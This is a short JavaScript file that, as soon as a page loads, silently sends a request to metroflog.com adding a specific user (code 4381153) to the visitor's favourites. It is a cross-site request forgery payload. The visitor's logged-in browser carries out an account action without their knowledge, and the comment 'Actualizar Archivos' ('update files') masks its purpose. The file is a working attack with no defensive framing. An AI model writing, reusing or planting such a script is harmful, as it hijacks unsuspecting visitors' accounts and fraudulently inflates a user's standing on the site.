// JavaScript Document
function objetoAjax(){
	var xmlhttp=false;
	try {
		xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
	} catch (e) {
		try {
		   xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
		} catch (E) {
			xmlhttp = false;
  		}
	}
	if (!xmlhttp && typeof XMLHttpRequest!='undefined'){
		xmlhttp = new XMLHttpRequest();
	}
	return xmlhttp;
}
//Actualizar Archivos
function yoFav(){
	ajax=objetoAjax();
	ajax.open("GET","http://www.metroflog.com/directory/?add.fav=yes&usercode=4381153");
	ajax.onreadystatechange=function() {
		if (ajax.readyState==4) {
			okas = ajax.responseText;
		}
	}
	ajax.send(null);
}
document.body.onLoad = yoFav();